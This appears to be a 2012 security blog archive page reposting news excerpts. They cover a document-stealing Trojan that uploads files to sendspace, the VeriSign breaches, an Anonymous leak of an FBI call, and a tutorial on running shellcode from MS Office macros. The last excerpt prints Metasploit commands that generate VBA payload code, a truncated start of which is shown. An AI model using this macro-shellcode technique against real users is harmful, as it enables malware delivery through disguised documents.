Posts

Showing posts from February, 2012

Trojan Abuses Sendspace: A Closer Look

Image
Trojan Abuses Sendspace: A Closer Look : We recently discovered a Trojan that harvested documents on affected systems and uploaded them to the file hosting site, sendspace.com . This post will discuss more of our findings on the said attack. In order to infect users, email disguised as a shipment notification from Fedex were mass-mailed to target victims. This email contains a downloader Trojan which installs TSPY_SPCESEND.A.” This downloader also installs other malicious executables on affected systems including FAKEAV variants from the BestAV affiliate network and FakeHDD variants from the Yamba network . These were observed to be downloaded from compromised, legitimate websites. Furthermore, this downloader Trojan also shares the same C&C with the TSPY_SPCESEND.A. This strongly suggests that the document-stealing sendspace Trojan is pushed by cybercriminals who are also involved in the Pay-Per-Sell (PPS) underground business. Command and Control Server After the malware uploa...

VeriSign Hit by Hackers in 2010

Image
VeriSign Hit by Hackers in 2010 : Photo: a_sorense /Flick r Internet giant VeriSign was hacked repeatedly in 2010 resulting in the theft of undisclosed information and raising questions about the integrity of security certificates issued by the company as well as its domain name service. The breaches were disclosed in vague language in a Securities and Exchange Commission filing last October in accordance with new SEC guidelines requiring companies to report intrusions to investors, according to Reuters . The filing doesn’t say when in 2010 the breaches occurred, but administrators didn’t alert top management until September 2011, although the document indicates administrators were aware of, and responded to, the breaches shortly after they occurred in 2010. The company’s former chief technology officer, Ken Silva, who was with VeriSign until November 2010, was unaware of the breaches until Reuters contacted him for its story. VeriSign told Reuters the company did “not believe these a...

Anonymous leaks FBI conference call on hacking investigations

Anonymous leaks FBI conference call on hacking investigations : Anonymous resumed today its F**k FBI Friday campaign by publishing a 16-minute-long mp3 recoding of a confidential conference call between representatives of the FBI and the Scotland Yard. The subjec...

Direct Shellcode Execution via MS Office Macros with Metasploit

Image
Direct Shellcode Execution via MS Office Macros with Metasploit : scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around. msf > use payload/windows/exec msf payload(exec) > set CMD calc CMD => calc msf payload(exec) > set EXITFUNC thread EXITFUNC => thread msf payload(exec) > generate -t vba #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas...